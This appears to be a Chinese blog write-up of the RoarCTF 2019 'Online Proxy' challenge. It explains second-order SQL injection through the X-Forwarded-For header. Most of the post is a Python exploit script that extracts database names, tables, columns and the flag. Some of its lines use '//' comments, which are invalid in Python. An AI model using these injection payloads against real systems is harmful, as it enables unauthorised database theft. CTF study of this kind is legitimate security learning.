• [RoarCTF 2019]Online Proxy


    0x00 知识点

    XFF头注入

    0x01 解题

    打开题目查看源代码,看到客户端IP,猜测是把客户端的IP地址记录到数据库当中。
    经过测试X-Forwarded-For修改后回显不同,找到注入点
    贴脚本:
    https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/online_proxy/writeup/Exp.py

    #!/usr/bin/env python3
    
    import requests
    
    target = "http://localhost:8302/"
    
    def execute_sql(sql):
        print("[*]请求语句:" + sql)
        return_result = ""
    
        payload = "0'|length((" + sql + "))|'0"
        session = requests.session()
        r = session.get(target, headers={'X-Forwarded-For': payload})
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
        r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})
        start_pos = r.text.find("Last Ip: ")
        end_pos = r.text.find(" -->", start_pos)
        length = int(r.text[start_pos + 9: end_pos])
        print("[+]长度:" + str(length))
    
        for i in range(1, length + 1, 5):
            payload = "0'|conv(hex(substr((" + sql + ")," + str(i) + ",5)),16,10)|'0"
    
            r = session.get(target, headers={'X-Forwarded-For': payload}) # 将语句注入
            r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 查询上次IP时触发二次注入
            r = session.get(target, headers={'X-Forwarded-For': 'glzjin'})    # 再次查询得到结果
            start_pos = r.text.find("Last Ip: ")
            end_pos = r.text.find(" -->", start_pos)
            result = int(r.text[start_pos + 9: end_pos])
            return_result += bytes.fromhex(hex(result)[2:]).decode('utf-8')
    
            print("[+]位置 " + str(i) + " 请求五位成功:" + bytes.fromhex(hex(result)[2:]).decode('utf-8'))
    
        return return_result
    
    
    //获取数据库
    print("[+]获取成功:" + execute_sql("SELECT group_concat(SCHEMA_NAME) FROM information_schema.SCHEMATA"))
    
    // 获取数据库表
    print("[+]获取成功:" + execute_sql("SELECT group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e'"))
    
    //获取数据库表
    print("[+]获取成功:" + execute_sql("SELECT group_concat(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'F4l9_D4t4B45e' AND TABLE_NAME = 'F4l9_t4b1e' "))
    
    // 获取表中内容
    print("[+]获取成功:" + execute_sql("SELECT group_concat(F4l9_C01uMn) FROM F4l9_D4t4B45e.F4l9_t4b1e"))
    
    

    参考链接
    https://github.com/berTrAM888/RoarCTF-Writeup-some-Source-Code/blob/master/Web/online_proxy/writeup/Exp.py

  • 相关阅读:
    python字符串格式化
    MFC----任务管理器的制作
    高斯消元方程组
    linux qq下载
    python——tuple元组
    Codeforces 515C. Drazil and Factorial
    HDU 1102 Constructing Roads (最小生成树)
    hdu 01背包汇总(1171+2546+1864+2955。。。
    HDU 3392 Pie(DP)
    HDU 1024
  • 原文地址:https://www.cnblogs.com/wangtanzhi/p/12296485.html
Copyright © 2020-2023  润新知